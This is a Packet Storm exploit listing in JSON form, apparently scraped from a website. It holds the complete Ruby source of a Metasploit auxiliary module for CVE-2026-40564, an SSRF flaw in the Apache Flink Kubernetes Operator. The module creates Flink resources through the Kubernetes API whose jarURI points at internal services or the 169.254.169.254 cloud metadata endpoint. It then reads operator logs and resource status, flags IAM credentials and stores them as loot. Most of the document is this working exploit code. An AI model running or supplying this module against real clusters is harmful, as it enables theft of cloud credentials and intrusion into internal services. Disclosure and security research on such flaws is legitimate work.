{“lastseen”:”2026-06-16T15:59:23″,”description”:”This is a Metasploit auxiliary module to demonstrate a service-side request forgery vulnerability in Apache Flink Kubernetes Operator version 1.14.0…”,”published”:”2026-06-16T00:00:00″,”modified”:”2026-06-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:223516″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-40564″],”sourceData”:”==================================================================================================================================\\n | # Title : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploit Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 151.0.3 (64 bits) |\\n | # Vendor : https:\/\/flink.apache.org\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator\\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Apache Flink Kubernetes Operator SSRF (CVE-2026-40564)’,\\n ‘Description’ =\\u003e %q{\\n A Server-Side Request Forgery (SSRF) vulnerability exists in the Apache\\n Flink Kubernetes Operator versions 1.14.0 through 1.15-SNAPSHOT (as of\\n 2026-04-09). The operator does not validate the `spec.job.jarURI` field\\n on FlinkSessionJob or FlinkDeployment resources. Anyone who can create\\n these resources can set the jarURI to any URL, including internal services,\\n cloud metadata endpoints, or filesystem paths.\\n \\n When the operator reconciles the resource, it fetches the URL from inside\\n its own pod, enabling attackers to:\\n – Read cloud instance metadata (AWS\/GCE\/Azure IAM credentials)\\n – Access internal cluster services\\n – Read local files via file:\/\/ scheme\\n – Scan internal ports\\n \\n This module provides detection and exploitation capabilities for this\\n SSRF vulnerability.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-40564’],\\n [‘URL’, ‘https:\/\/lists.apache.org\/thread\/o1b3c08boc8fc9zw9qff5wsd3oc0l6sw’],\\n [‘URL’, ‘https:\/\/flink.apache.org\/2026\/05\/28\/flink-kubernetes-operator-ssrf-cve-2026-40564\/’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-05-28’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base Kubernetes API path’, ‘\/’]),\\n OptString.new(‘NAMESPACE’, [false, ‘Kubernetes namespace’, ‘default’]),\\n OptString.new(‘OPERATOR_POD’, [false, ‘Operator pod name (auto-detected if not set)’]),\\n OptString.new(‘SSRF_URL’, [true, ‘Target URL for SSRF (e.g., http:\/\/169.254.169.254\/latest\/meta-data\/)’]),\\n OptString.new(‘RESOURCE_NAME’, [false, ‘FlinkSessionJob resource name’, ‘ssrf-exploit’]),\\n OptString.new(‘BEARER_TOKEN’, [false, ‘Kubernetes API bearer token’]),\\n OptBool.new(‘USE_SESSION_CLUSTER’, [true, ‘Use FlinkSessionJob instead of FlinkDeployment’, true]),\\n OptInt.new(‘TIMEOUT’, [false, ‘HTTP request timeout’, 30])\\n ])\\n end\\n \\n def k8s_api_url\\n \\”https:\/\/#{datastore[‘RHOST’]}:#{datastore[‘RPORT’]}\\”\\n end\\n \\n def k8s_headers\\n headers = { ‘Content-Type’ =\\u003e ‘application\/json’ }\\n \\n if datastore[‘BEARER_TOKEN’] \\u0026\\u0026 !datastore[‘BEARER_TOKEN’].empty?\\n headers[‘Authorization’] = \\”Bearer #{datastore[‘BEARER_TOKEN’]}\\”\\n end\\n \\n headers\\n end\\n def get_operator_pod\\n namespace = datastore[‘NAMESPACE’]\\n url = \\”#{k8s_api_url}\/api\/v1\/namespaces\/#{namespace}\/pods\\”\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘ssl’ =\\u003e true\\n )\\n if res \\u0026\\u0026 res.code == 200\\n begin\\n pods = JSON.parse(res.body)\\n pods[‘items’].each do |pod|\\n if pod[‘metadata’][‘name’] =~ \/flink-kubernetes-operator\/\\n operator_pod = pod[‘metadata’][‘name’]\\n print_good(\\”Found operator pod: #{operator_pod}\\”)\\n return operator_pod\\n end\\n end\\n rescue JSON::ParserError\\n print_error(\\”Failed to parse pods response\\”)\\n end\\n end\\n nil\\n end\\n def create_flink_session_job(resource_name, namespace, jar_uri)\\n print_status(\\”Creating FlinkSessionJob resource: #{resource_name}\\”)\\n session_job = {\\n apiVersion: \\”flink.apache.org\/v1beta1\\”,\\n kind: \\”FlinkSessionJob\\”,\\n metadata: {\\n name: resource_name,\\n namespace: namespace\\n },\\n spec: {\\n job: {\\n jarURI: jar_uri,\\n parallelism: 1,\\n upgradeMode: \\”stateless\\”\\n },\\n flinkConfiguration: {},\\n jobManager: {},\\n taskManager: {}\\n }\\n }\\n url = \\”#{k8s_api_url}\/apis\/flink.apache.org\/v1beta1\/namespaces\/#{namespace}\/flinksessionjobs\\”\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘data’ =\\u003e session_job.to_json,\\n ‘ssl’ =\\u003e true\\n )\\n if res \\u0026\\u0026 res.code == 201\\n print_good(\\”FlinkSessionJob created successfully\\”)\\n return true\\n else\\n print_error(\\”Failed to create FlinkSessionJob: HTTP #{res\\u0026.code}\\”)\\n return false\\n end\\n end\\n def create_flink_deployment(resource_name, namespace, jar_uri)\\n print_status(\\”Creating FlinkDeployment resource: #{resource_name}\\”)\\n deployment = {\\n apiVersion: \\”flink.apache.org\/v1beta1\\”,\\n kind: \\”FlinkDeployment\\”,\\n metadata: {\\n name: resource_name,\\n namespace: namespace\\n },\\n spec: {\\n flinkVersion: \\”v1_17\\”,\\n flinkConfiguration: {},\\n jobManager: {},\\n taskManager: {},\\n job: {\\n jarURI: jar_uri,\\n parallelism: 1,\\n upgradeMode: \\”stateless\\”\\n }\\n }\\n }\\n \\n url = \\”#{k8s_api_url}\/apis\/flink.apache.org\/v1beta1\/namespaces\/#{namespace}\/flinkdeployments\\”\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘data’ =\\u003e deployment.to_json,\\n ‘ssl’ =\\u003e true\\n )\\n \\n if res \\u0026\\u0026 res.code == 201\\n print_good(\\”FlinkDeployment created successfully\\”)\\n return true\\n else\\n print_error(\\”Failed to create FlinkDeployment: HTTP #{res\\u0026.code}\\”)\\n return false\\n end\\n end\\n \\n def get_resource_status(resource_name, namespace)\\n resource_type = datastore[‘USE_SESSION_CLUSTER’] ? ‘flinksessionjobs’ : ‘flinkdeployments’\\n url = \\”#{k8s_api_url}\/apis\/flink.apache.org\/v1beta1\/namespaces\/#{namespace}\/#{resource_type}\/#{resource_name}\\”\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘ssl’ =\\u003e true\\n )\\n if res \\u0026\\u0026 res.code == 200\\n begin\\n return JSON.parse(res.body)\\n rescue JSON::ParserError\\n return nil\\n end\\n end\\n nil\\n end\\n def get_operator_logs(pod_name, namespace)\\n url = \\”#{k8s_api_url}\/api\/v1\/namespaces\/#{namespace}\/pods\/#{pod_name}\/log\\”\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘ssl’ =\\u003e true\\n )\\n if res \\u0026\\u0026 res.code == 200\\n return res.body\\n end\\n \\n nil\\n end\\n def check_ssrf_in_logs(logs, target_url)\\n if logs \\u0026\\u0026 logs.include?(‘HttpArtifactFetcher.fetch’) \\u0026\\u0026 logs.include?(target_url)\\n print_good(\\”SSRF confirmed in operator logs\\”)\\n return true\\n end\\n false\\n end\\n def delete_resource(resource_name, namespace)\\n resource_type = datastore[‘USE_SESSION_CLUSTER’] ? ‘flinksessionjobs’ : ‘flinkdeployments’\\n url = \\”#{k8s_api_url}\/apis\/flink.apache.org\/v1beta1\/namespaces\/#{namespace}\/#{resource_type}\/#{resource_name}\\”\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘uri’ =\\u003e url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘ssl’ =\\u003e true\\n )\\n if res \\u0026\\u0026 [200, 202, 204].include?(res.code)\\n print_good(\\”Resource deleted successfully\\”)\\n return true\\n else\\n print_warning(\\”Failed to delete resource: HTTP #{res\\u0026.code}\\”)\\n return false\\n end\\n end\\n def extract_metadata_response(response_body)\\n if response_body \\u0026\\u0026 !response_body.empty?\\n print_good(\\”SSRF response received:\\”)\\n print_line(response_body[0..1000])\\n \\n if response_body.include?(‘iam’) || response_body.include?(‘security-credentials’)\\n print_good(\\”Potential IAM credentials detected!\\”)\\n role_match = response_body.match(\/([a-zA-Z0-9\\\\-_]+)\/)\\n if role_match\\n print_status(\\”IAM Role detected: #{role_match[1]}\\”)\\n end\\n end\\n return true\\n end\\n false\\n end\\n def cleanup(resource_name, namespace)\\n print_status(\\”Cleaning up resources…\\”)\\n delete_resource(resource_name, namespace)\\n end\\n def check_permissions(namespace)\\n url = \\”#{k8s_api_url}\/apis\/flink.apache.org\/v1beta1\/namespaces\/#{namespace}\/flinksessionjobs\\”\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘data’ =\\u003e {}.to_json, # Empty body to test permissions\\n ‘ssl’ =\\u003e true\\n )\\n \\n if res \\u0026\\u0026 (res.code == 201 || res.code == 403)\\n if res.code == 403\\n print_error(\\”Insufficient permissions to create Flink resources\\”)\\n return false\\n else\\n print_good(\\”Sufficient permissions to create Flink resources\\”)\\n return true\\n end\\n end\\n \\n print_warning(\\”Could not determine permissions\\”)\\n true \\n end\\n \\n def run_host(ip)\\n print_status(\\”CVE-2026-40564 – Apache Flink Kubernetes Operator SSRF\\”)\\n print_status(\\”Target: #{peer}\\”)\\n print_status(\\”SSRF Target URL: #{datastore[‘SSRF_URL’]}\\”)\\n \\n namespace = datastore[‘NAMESPACE’]\\n resource_name = \\”#{datastore[‘RESOURCE_NAME’]}-#{Rex::Text.rand_text_alpha_lower(6)}\\”\\n \\n print_status(\\”Checking Kubernetes API connectivity…\\”)\\n version_url = \\”#{k8s_api_url}\/version\\”\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e version_url,\\n ‘headers’ =\\u003e k8s_headers,\\n ‘ssl’ =\\u003e true\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n print_error(\\”Cannot connect to Kubernetes API. Check RHOST, RPORT, and credentials.\\”)\\n return\\n end\\n \\n print_good(\\”Connected to Kubernetes API\\”)\\n \\n unless check_permissions(namespace)\\n print_error(\\”Insufficient permissions to exploit SSRF\\”)\\n return\\n end\\n \\n print_status(\\”Creating malicious Flink resource…\\”)\\n \\n if datastore[‘USE_SESSION_CLUSTER’]\\n success = create_flink_session_job(resource_name, namespace, datastore[‘SSRF_URL’])\\n else\\n success = create_flink_deployment(resource_name, namespace, datastore[‘SSRF_URL’])\\n end\\n \\n unless success\\n print_error(\\”Failed to create malicious resource\\”)\\n return\\n end\\n \\n print_status(\\”Waiting for operator reconciliation (15 seconds)…\\”)\\n Rex.sleep(15)\\n \\n status = get_resource_status(resource_name, namespace)\\n \\n if status \\u0026\\u0026 status[‘status’]\\n print_status(\\”Resource status: #{status[‘status’].to_json[0..200]}\\”)\\n \\n if status[‘status’].to_s.include?(‘Failed to fetch’) ||\\n status[‘status’].to_s.include?(‘Connection refused’) ||\\n status[‘status’].to_s.include?(‘connect timed out’)\\n print_good(\\”SSRF attempt confirmed – operator tried to fetch the URL\\”)\\n end\\n end\\n \\n operator_pod = datastore[‘OPERATOR_POD’]\\n if operator_pod.nil? || operator_pod.empty?\\n operator_pod = get_operator_pod\\n end\\n \\n if operator_pod\\n print_status(\\”Fetching operator logs…\\”)\\n logs = get_operator_logs(operator_pod, namespace)\\n \\n if logs \\u0026\\u0026 logs.include?(datastore[‘SSRF_URL’])\\n print_good(\\”SSRF CONFIRMED – operator fetched the URL!\\”)\\n \\n if logs =~ \/GET.*?#{Regexp.escape(datastore[‘SSRF_URL’])}\/\\n print_good(\\”HTTP GET request to #{datastore[‘SSRF_URL’]} found in logs\\”)\\n end\\n \\n if logs =~ \/HttpArtifactFetcher\\\\.fetch\/\\n print_good(\\”HttpArtifactFetcher call confirmed\\”)\\n end\\n end\\n end\\n \\n if datastore[‘SSRF_URL’].include?(‘169.254.169.254’) || datastore[‘SSRF_URL’].include?(‘metadata’)\\n print_status(\\”Attempting to read AWS metadata response…\\”)\\n \\n metadata_url = datastore[‘SSRF_URL’]\\n if !metadata_url.end_with?(‘\/’)\\n metadata_url = metadata_url + ‘\/’\\n end\\n \\n if datastore[‘USE_SESSION_CLUSTER’]\\n create_flink_session_job(\\”#{resource_name}-metadata\\”, namespace, metadata_url)\\n else\\n create_flink_deployment(\\”#{resource_name}-metadata\\”, namespace, metadata_url)\\n end\\n \\n Rex.sleep(10)\\n \\n metadata_status = get_resource_status(\\”#{resource_name}-metadata\\”, namespace)\\n \\n if metadata_status \\u0026\\u0026 metadata_status[‘status’]\\n status_text = metadata_status[‘status’].to_s\\n if status_text.include?(‘iam’) || status_text.include?(‘security-credentials’)\\n print_good(\\”Extracted metadata:\\”)\\n print_line(status_text[0..500])\\n \\n store_loot(\\n ‘flink.ssrf.metadata’,\\n ‘text\/plain’,\\n ip,\\n status_text,\\n ‘aws_metadata.txt’,\\n ‘AWS metadata captured via SSRF’\\n )\\n end\\n end\\n \\n if datastore[‘USE_SESSION_CLUSTER’]\\n delete_resource(\\”#{resource_name}-metadata\\”, namespace)\\n else\\n delete_resource(\\”#{resource_name}-metadata\\”, namespace)\\n end\\n end\\n \\n report_vuln(\\n host: ip,\\n port: datastore[‘RPORT’],\\n name: name,\\n refs: references,\\n info: \\”Apache Flink Kubernetes Operator SSRF (CVE-2026-40564) – Able to fetch #{datastore[‘SSRF_URL’]}\\”\\n )\\n if datastore[‘Cleanup’]\\n cleanup(resource_name, namespace)\\n else\\n print_status(\\”Resource #{resource_name} left for manual inspection\\”)\\n print_status(\\”Clean up with: kubectl delete -n #{namespace} #{datastore[‘USE_SESSION_CLUSTER’] ? ‘flinksessionjob’ : ‘flinkdeployment’} #{resource_name}\\”)\\n end\\n \\n print_good(\\”SSRF exploitation completed\\”)\\n end\\n end\\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223516″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223516\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-16T15:59:23″,”description”:”This is a Metasploit auxiliary module to demonstrate a service-side request forgery vulnerability in Apache Flink Kubernetes Operator version 1.14.0…”,”published”:”2026-06-16T00:00:00″,”modified”:”2026-06-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Apache Flink Kubernetes Operator 1.14.0…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-63184","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n